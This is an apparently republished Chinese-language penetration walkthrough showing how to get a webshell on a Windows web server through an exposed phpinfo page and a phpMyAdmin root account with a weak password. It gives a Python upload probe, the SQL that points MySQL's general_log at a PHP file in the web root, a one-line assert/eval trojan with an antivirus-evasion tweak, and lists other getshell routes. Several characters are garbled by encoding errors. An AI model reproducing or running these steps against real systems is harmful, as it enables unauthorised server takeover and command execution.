phpmyadmin+phpinfo()+webshell如何簡單繞過getshell

phpmyadmin+phpinfo()+webshell如何簡單繞過getshell，很多新手對此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來學(xué)習(xí)下，希望你能有所收獲。

信息收集

通過信息收集發(fā)現(xiàn)phpinfo頁面：

找到關(guān)鍵信息web路徑C:/ps/WWW

首先想到的是臨時(shí)目錄批量上傳文件然后再利用文件包含漏洞拿shell

先測試有沒有臨時(shí)目錄：

編寫腳本，上傳文件探測是否存在phpinfo包含臨時(shí)文件的信息。

import requests

 

files = {

  'file': ("aa.txt","ssss")

}

url = "http://x.x.x.x/phpinfo.php"

r = requests.post(url=url, files=files, allow_redirects=False)

print(r.text)

發(fā)現(xiàn)存在臨時(shí)文件

繼續(xù)利用條件競爭上傳失敗。

然后測試有沒有文件包含，并沒有。

然后繼續(xù)信息收集發(fā)現(xiàn)phpmyadmin  并且發(fā)現(xiàn)root用戶弱口令漏洞

經(jīng)測試發(fā)現(xiàn)mysql中的Into outfile被禁用:

The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

下一步查詢general_log處于開啟狀態(tài)，狀態(tài)為開啟的時(shí)候，系統(tǒng)將mysql以后執(zhí)行的每一條查詢語句寫入你指定的位置的文件里。而文件的位置則由general_log_file確定。我們可以開啟這個(gè)選項(xiàng)后，可以先指定路徑為一個(gè)php文件，再執(zhí)行sql語句SELECT '<?php assert($_POST["cmd"]);?>';，這個(gè)指令就把木馬插入到你指定的php文件中去了。

于是我們可以設(shè)置general_log_file為一個(gè)php文件，最后用一句話木馬進(jìn)行查詢來獲取shell

漏洞利用

由于前面phpinfo頁面里已經(jīng)找到web路徑，可構(gòu)造以下語句：

SET global general_log_file='C:/ps/www/xiaoma.php';

寫入webshell的時(shí)候發(fā)現(xiàn)直接構(gòu)造eval函數(shù)訪問的時(shí)候提示報(bào)錯(cuò)大概的意思就是提示文件內(nèi)容變?yōu)?行，判斷是被殺了。

于是稍微改動一下，如下圖，eval會將輸入的$a作為php語句執(zhí)行，因此只要對l賦一定的system命令值，就能夠執(zhí)行系統(tǒng)命令

訪問一下這次沒有被殺

shell到手：

思路

phpinfo漏洞利用思路如下：

1、phpinfo中可以看到上傳的臨時(shí)文件的路徑，從而實(shí)現(xiàn)LFI+getshell

https://www.pianshen.com/article/71091159796/

phpmyadmin漏洞利用思路如下：

1、利用全局變量general_log去getshell

2、利用slow_query_log慢查詢?nèi)罩緂etshell

3、利用phpmyadmin4.8.x本地文件包含漏洞getshell

https://www.icode9.com/content-3-218228.html

4、select into outfile直接寫入

https://www.lurbk.com/lur2774.html

看完上述內(nèi)容是否對您有幫助呢？如果還想對相關(guān)知識有進(jìn)一步的了解或閱讀更多相關(guān)文章，請關(guān)注億速云行業(yè)資訊頻道，感謝您對億速云的支持。